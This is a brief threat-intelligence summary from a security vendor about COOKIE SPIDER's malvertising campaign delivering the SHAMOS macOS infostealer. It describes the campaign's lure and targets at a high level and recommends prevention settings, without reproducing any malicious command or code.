MacOS Protection Thwarted COOKIE SPIDER's SHAMOS Deployment by Falcon Platform
Despite no publicly available information identifying the organization behind the cybercrime group "COOKIE SPIDER," defenders can remain vigilant against their activities, particularly the use of a variant of Atomic macOS Stealer (AMOS) named SHAMOS.
The campaign, which targeted users in multiple countries, was notable for excluding victims in Russia, likely due to eCrime forum restrictions. The malicious activity was facilitated through malvertising websites, directing users to fraudulent macOS help websites. Here, victims were instructed to execute a malicious one-line installation command, leading to the deployment of SHAMOS.
SHAMOS operators have previously leveraged this method in Homebrew malvertising campaigns between May 2024 and January 2025. The malware collects sensitive information, including cryptocurrency-related wallet files and sensitive credential-based files on disk. It attempts to exfiltrate collected data using Base64-encoded URLs and ZIP archives.
To assist defenders in hunting for this and similar activity across their endpoints, Falcon® Next-Gen SIEM Advanced Event Search queries have been provided. These queries include the SHA256 hashes of SHAMOS Mach-O and Bash scripts. Additionally, the host URLs associated with SHAMOS have been identified.
It's worth noting that the legitimate iTerm2 GitHub repository can be found at https://github.com/gnachman/iTerm2. Malvertising websites containing instructions to download SHAMOS should be avoided.
Falcon® Insight XDR customers should ensure the following prevention policy settings are configured:
- Enable malware detection and prevention, including the detection and prevention of SHAMOS at the initial stages of the attack chain. This is facilitated by the Falcon® platform's use of machine learning and indicators of attack (IOAs).
- Configure settings to block malicious commands that bypass Gatekeeper security checks and install Mach-O executables directly onto victim devices.
In June-August 2025, the Falcon® platform blocked a malware campaign that targeted over 300 customer environments, underscoring the importance of these preventative measures.
COOKIE SPIDER operates as a malware-as-a-service, renting SHAMOS to cybercriminals for information theft and cryptocurrency asset harvesting. Remaining vigilant and implementing robust security measures can help protect against these threats.
